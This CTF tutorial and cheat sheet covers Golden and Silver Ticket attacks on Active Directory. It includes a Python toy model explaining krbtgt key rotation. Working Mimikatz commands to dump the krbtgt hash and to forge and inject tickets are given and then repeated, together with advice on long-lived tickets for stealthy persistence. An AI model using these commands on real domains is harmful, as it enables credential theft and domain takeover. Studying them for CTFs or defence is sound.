Golden Ticket Attacks

Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to vulnerabilities. The Golden Ticket attack exemplifies a critical AD weakness, promising attackers unparalleled access once exploited. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag (CTF) participants. Use it as a quick reference during your challenges.

Understanding the Basics

Golden Tickets: In a Golden Ticket attack, an attacker who has obtained the krbtgt account's NTLM hash forges a Kerberos Ticket Granting Ticket (TGT). Because the KDC validates a TGT by decrypting it with the krbtgt key alone, a forged TGT is accepted as genuine and carries whatever user and group memberships the attacker wrote into it, which gives near-total access within the AD domain.
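To make the trust relationship concrete, the following Python model (an added illustration, not Mimikatz or Kerberos code, with every key, account name and password constructed) stands in for the KDC. Real Kerberos encrypts the TGT with the krbtgt key; here an HMAC-SHA256 tag over the ticket fields plays that role. The model also shows why the standard remediation is to reset the krbtgt password twice: a domain controller keeps the previous key as well as the current one, so a single reset still accepts a ticket forged under the old key.

```python
"""Toy model: a TGT is trusted solely because it verifies under the krbtgt key,
so whoever holds that key can mint tickets, and only a double krbtgt reset
invalidates them. Added example; all names and passwords are constructed."""
import hashlib
import hmac
import json


def derive_key(password: str) -> bytes:
    """Stand-in for the krbtgt long-term key derived from its password."""
    return hashlib.sha256(password.encode()).digest()


def make_tgt(key: bytes, user: str, groups: list[str]) -> dict:
    """Build a ticket whose authenticity rests only on knowing `key`."""
    body = {"user": user, "groups": groups}
    payload = json.dumps(body, sort_keys=True).encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return {"body": body, "tag": tag}


def verify_tag(key: bytes, tgt: dict) -> bool:
    payload = json.dumps(tgt["body"], sort_keys=True).encode()
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tgt["tag"])


class ToyKDC:
    """Keeps the current and the previous krbtgt key, as a Windows DC does,
    so that tickets issued just before a reset keep working."""

    def __init__(self, krbtgt_password: str):
        self.current_key = derive_key(krbtgt_password)
        self.previous_key = None

    def issue_tgt(self, user: str, groups: list[str]) -> dict:
        return make_tgt(self.current_key, user, groups)

    def validate_tgt(self, tgt: dict) -> bool:
        """Accept a TGT if it verifies under the current OR the previous key."""
        return any(
            key is not None and verify_tag(key, tgt)
            for key in (self.current_key, self.previous_key)
        )

    def reset_krbtgt(self, new_password: str) -> None:
        self.previous_key = self.current_key
        self.current_key = derive_key(new_password)


def rotation_scenario() -> dict:
    """Legitimate ticket vs. ticket forged with a stolen key, before any reset,
    after one reset and after two. Returns (legit_accepted, forged_accepted)."""
    kdc = ToyKDC("constructed-krbtgt-password-1")
    stolen_key = kdc.current_key  # models the key an attacker has extracted
    legit = kdc.issue_tgt("alice", ["Domain Users"])
    forged = make_tgt(stolen_key, "Administrator", ["Domain Admins"])
    result = {"before_reset": (kdc.validate_tgt(legit), kdc.validate_tgt(forged))}
    kdc.reset_krbtgt("constructed-krbtgt-password-2")
    result["after_one_reset"] = (kdc.validate_tgt(legit), kdc.validate_tgt(forged))
    kdc.reset_krbtgt("constructed-krbtgt-password-3")
    result["after_two_resets"] = (kdc.validate_tgt(legit), kdc.validate_tgt(forged))
    return result


if __name__ == "__main__":
    for stage, (legit_ok, forged_ok) in rotation_scenario().items():
        print(f"{stage}: legitimate={legit_ok} forged={forged_ok}")
```

After the second reset the legitimate ticket is rejected too, which is expected: every holder simply re-authenticates and receives a fresh TGT. That is why the two resets are spaced apart long enough for replication to finish and outstanding tickets to expire, rather than run back to back.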

Golden Ticket Attack

Tools You Need:

  • Mimikatz: Central to extracting key hashes and generating Golden Tickets.
  • PowerShell Empire: Offers post-exploitation and lateral movement capabilities.
  • CrackMapExec (CME): Useful for post-exploitation tasks after obtaining the Golden Ticket.

Initial Access and Privesc

For the Golden Ticket attack to be viable, you first need to compromise the network and elevate privileges:

# Using CrackMapExec to identify weak points and exploit
crackmapexec smb target_network_range

Golden Ticket Attack Cheat Sheet

Extracting the krbtgt Hash:

With domain administrator privileges, the next move is to extract the krbtgt hash:

# Mimikatz command for fetching the krbtgt hash
lsadump::lsa /inject /name:krbtgt

Creating the Golden Ticket:

With the krbtgt hash in hand, it’s time to forge the Golden Ticket:

# Mimikatz command to generate a Golden Ticket
kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Using the Golden Ticket:

Once you’ve created the Golden Ticket, it needs to be loaded into your session:

# Mimikatz to load the Golden Ticket
kerberos::ptt golden_ticket.tkt

From here, you can access resources, execute commands, or perform other actions as the account named in the forged ticket, with the group memberships it claims.

Attack Strategy

  • Stealth and Persistence: It’s possible to set long lifetimes for your Golden Ticket, allowing you to maintain a foothold in the compromised domain for extended periods.
  • Silver Tickets: These are forged service tickets rather than TGTs, keyed with the hash of the account that runs the target service (often a computer account) instead of the krbtgt hash. They grant access to that one service only, but because the ticket is never presented to a domain controller they can often fly under the radar, being less detectable:

# Crafting a Silver Ticket using Mimikatz (the key is the service account's hash, not krbtgt's)
kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /target:target_server_name.target_domain.local /service:cifs /rc4:service_account_hash_here /ticket:silver_ticket.tkt

Quick Reference

krbtgt Hash Extraction:

lsadump::lsa /inject /name:krbtgt

Golden Ticket Creation:

kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Loading the Ticket:

kerberos::ptt golden_ticket.tkt

Closing Thoughts

The Golden Ticket attack serves as a stark reminder of the importance of robust security practices in AD. For the CTF enthusiast, understanding this attack not only bolsters offensive capabilities but also strengthens defensive strategies. Remember to use this knowledge responsibly. The true essence of CTF challenges lies in learning and ethical application.
